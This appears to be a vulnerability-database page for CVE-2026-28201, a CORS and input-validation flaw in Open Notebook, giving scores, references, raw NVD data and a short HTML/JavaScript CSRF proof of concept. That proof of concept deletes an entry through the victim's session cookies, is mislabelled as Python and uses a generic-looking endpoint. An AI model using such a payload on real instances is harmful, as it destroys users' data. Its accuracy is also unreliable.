CVE-2026-28201

Description

An improper input validation, together with an overly permissive default CORS configuration in Open Notebook v1.8.1 allows remote attacker to trick a legitimate user to alter or delete arbitrary database entries via specially crafted malicious URL. Depending on the deployment, data exfiltration is also possible.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lfnovo:open-notebook:*:*:*:*:*:*:*:* - VULNERABLE

Open Notebook v1.8.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
  PoC for CVE-2026-28201
  This script demonstrates the exploitation of the CORS misconfiguration
  and lack of input validation to delete a database entry.
-->
<html>
  <body>
    <script>
      // Target URL of the vulnerable Open Notebook instance
      const targetUrl = 'http://target-open-notebook.com/api/entries';
      
      // Malicious payload to delete an entry with ID 1
      const maliciousData = {
        id: '1',
        action: 'delete'
      };

      fetch(targetUrl, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify(maliciousData),
        credentials: 'include' // Sends cookies, utilizing the victim's session
      })
      .then(response => console.log('Attack executed with status:', response.status))
      .catch(error => console.error('Attack failed:', error));
    </script>
  </body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-28201
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-28201
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-28201/
[4] VulDB https://vuldb.com/cve/CVE-2026-28201
[5] https://github.com/lfnovo/open-notebook/security/advisories/GHSA-5wj9-f8q5-8f9c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-28201", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-07T11:16:00.747", "lastModified": "2026-05-07T20:20:10.207", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper input validation, together with an overly permissive default CORS configuration in Open Notebook v1.8.1 allows remote attacker to trick a legitimate user to alter or delete arbitrary database entries via specially crafted malicious URL. Depending on the deployment, data exfiltration is also possible."}], "metrics": {"cvssMetricV40": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-352"}, {"lang": "en", "value": "CWE-917"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfnovo:open-notebook:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.3", "matchCriteriaId": "098D8544-AAE9-4880-A866-FCD895172668"}]}]}], "references": [{"url": "https://github.com/lfnovo/open-notebook/security/advisories/GHSA-5wj9-f8q5-8f9c", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "tags": ["Vendor Advisory"]}]}}